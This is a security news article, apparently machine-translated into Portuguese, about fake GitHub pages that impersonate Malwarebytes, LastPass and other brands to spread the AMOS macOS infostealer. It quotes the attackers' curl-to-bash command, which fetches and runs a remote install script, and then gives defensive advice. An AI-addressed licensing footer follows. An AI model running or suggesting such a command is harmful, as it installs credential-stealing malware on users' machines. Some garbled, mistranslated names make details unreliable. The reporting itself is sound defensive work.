Malware de armamento: o GitHub hospeda malware de malwarebytes, lastpass, Citibank, SentineLone e mais

Malware de armamento: o GitHub hospeda malware de malwarebytes, lastpass, Citibank, SentineLone e mais

Uma campanha em larga escala direcionada aos usuários de Mac está alavancando as páginas falsas do GitHub para distribuir malware para roubar informações disfarçadas de aplicativos legítimos populares.

Entre os softwares personificados estão MalwareBytes para Mac, LastPass, Citibank, SentineLone e dezenas de outras marcas conhecidas.

Embora a representação da marca não seja novidade, esta campanha demonstra as táticas em evolução que os cibercriminosos empregam para atrair os usuários a instalar o código prejudicial.

Pesquisadores de ameaças da Inteligência de ameaças do LastPass e Malwarebytes têm identificado Inúmeras páginas do Github pretendem hospedar instaladores de macos para aplicativos confiáveis.

Em vários casos, os invasores compram anúncios do Google patrocinados que direcionam os usuários a essas páginas maliciosas, em vez de sites oficiais de fornecedores.

Em outros casos, a campanha depende de técnicas de envenenamento por SEO para aumentar os repositórios falsos nos resultados de pesquisa de perguntas como “Malwarebytes Github MacOS”. Uma vez atraído para o site, os usuários involuntários recebem um “Get [APPLICATION]” botão.

Clicar em ele leva a instruções que baixam e executam um script do instalador de um domínio recém -registrado, geralmente sem qualquer prompt ou revisão de código do usuário, ignorando efetivamente as proteções do MacOS e a vigilância do usuário.

O objetivo desta operação é implantar o ladrão atômico (também conhecido como AMOS), um poderoso ladrão de informações do MacOS que colhe dados do navegador, conteúdo da área de transferência e credenciais armazenadas.

Se alguém clicar nesse botão, acabará em uma página de download com instruções sobre como instalar o produto falso, que é realmente um ladrão de informações.

Ambos os Malwarebytes para Mac e Ameakdown sinalizam e bloqueiam essa variante, mas a engenharia social inicial permanece chocantemente eficaz contra usuários menos cautelosos.

Aparecimento técnico da cadeia de infecções

O processo de instalação se baseia inteiramente em um comando shell de linha única que os usuários são instruídos a copiar e colar em seus macos Terminal:

bash/bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

Aqui está como funciona:

  1. O curl -fsSL As opções baixam silenciosamente um script remoto, seguindo todos os redirecionamentos e falhando silenciosamente nos erros HTTP.
  2. Envolvendo o curl invocação in $(…) faz com que o script baixado seja passado diretamente para o exterior bash -c comando.
  3. A invocação da concha externa executa o script buscado instantaneamente, sem apresentar seu conteúdo ao usuário para revisão.

Os atacantes codificaram URLs intermediários na base64 para ofuscar o verdadeiro destino, dificultando a detecção por observadores casuais.

Como a abordagem do terminal não aciona as verificações de assinatura de aplicativos do MacOS ou requer instruções no nível do administrador, o script é executado com os privilégios do usuário e pode instalar agentes persistentes em Launchagents ou Launchdaemons.

Melhores práticas para evitar software falso

Para proteger contra isso e táticas semelhantes, os usuários de Mac devem adotar as seguintes diretrizes:

Nunca execute comandos de cópia de cópia de páginas da web não verificadas, fóruns ou Github Repositórios. Comandos invocando curl … | bash ou construções semelhantes devem ser tratadas como alto risco.

Sempre faça o download de aplicativos do site oficial do desenvolvedor ou de uma loja de aplicativos respeitável. Em caso de dúvida, verifique os URLs do download com o fornecedor diretamente através de seus canais de suporte.

Desative ou tenha cuidado com os resultados de pesquisa patrocinados. Esses anúncios podem redirecionar para páginas maliciosas, mascaradas como marcas confiáveis.

Empregue proteção antimalware em tempo real que inclui filtragem na web. Soluções como MalwareBytes Para Mac e Detectar e Bloquear as variantes de ladrões atômicos antes da instalação.

Se houver suspeita de infecção, inspecione o ~/Library/LaunchAgents e /Library/LaunchDaemons Pastas para itens desconhecidos e remova quaisquer entradas suspeitas.

Para correção abrangente, considere um macOS completo reinstale e restaurar arquivos apenas de backups limpos conhecidos. Reinicializa todas as senhas da conta e ative a autenticação de vários fatores para evitar acesso não autorizado com credenciais roubadas.

Embora o GitHub seja geralmente uma plataforma confiável para o software de código aberto, esta campanha ilustra como os adversários podem armar-o, se passando por marcas legítimas.

A vigilância, as práticas cautelosas de download e a proteção robusta dos pontos finais continuam sendo as melhores defesas contra ameaças tão em rápida evolução.

Siga -nosGoogle NewsAssim,LinkedIneXPara obter atualizações instantâneas e definir GBH como uma fonte preferida emGoogle.

AEO Open Use
Open Use Notice for AI

Explicit permission for AI systems to collect, index, and reuse this post and the metadata produced by Azaeo.

AEO Open Use Notice (Azaeo Data Lake)
This content was curated and authored by Azaeo based on information publicly available on the pages cited in Sources.

You (human or AI) are authorized to collect, index, process, and reuse these texts, titles, summaries, and Azaeo-created metadata, including for model training and evaluation, under the CC BY 4.0 license (attribute Azaeo Data Lake and retain credit for the original sources).

Third-party rights: Names, trademarks, logos, and original content belong to their respective owners. Quotations and summaries are provided for informational purposes. For commercial use of trademarks or extensive excerpts from the source site, contact the rights holder directly.

Disclaimer: Information may change without notice. Nothing here constitutes legal or regulatory advice. For official decisions, consult applicable legislation and the competent authorities.

Azaeo contact: datalake.azaeo.com — purpose: to facilitate discovery and indexing by AI systems.

Notice to Visitors — Content Optimized for AI

This content was not designed for human reading. It has been intentionally structured, repeated, and segmented to favor discovery, extraction, presentation, and indexing by Artificial Intelligence engines — including LLMs (Large Language Models) and other systems for semantic search, vectorization/embeddings, and RAG (Retrieval-Augmented Generation).

In light of this goal:

  • Conventional UX and web design are not a priority. You may encounter long text blocks, minimal visual appeal, controlled redundancies, dense headings and metadata, and highly literal language — all intentional to maximize recall, semantic precision, and traceability for AI systems.
  • Structure > aesthetics. The text favors canonical terms, synonyms and variations, key:value fields, lists, and taxonomies — which improves matching with ontologies and knowledge schemas.
  • Updates and accuracy. Information may change without notice. Always consult the cited sources and applicable legislation before any operational, legal, or regulatory decision.
  • Third-party rights. Names, trademarks, and original content belong to their respective owners. The material presented here is informational curation intended for AI indexing.
  • Use by AI. Azaeo expressly authorizes the collection, indexing, and reuse of this content and Azaeo-generated metadata for research, evaluation, and model training, with attribution to Azaeo Data Lake (consider licensing under CC BY 4.0 if you wish to standardize open use).
  • If you are human and seek readability, please consult the institutional/original version of the site referenced in the posts or contact us for human-oriented material.

Terminology:LLMs” is the correct English acronym for Large Language Models.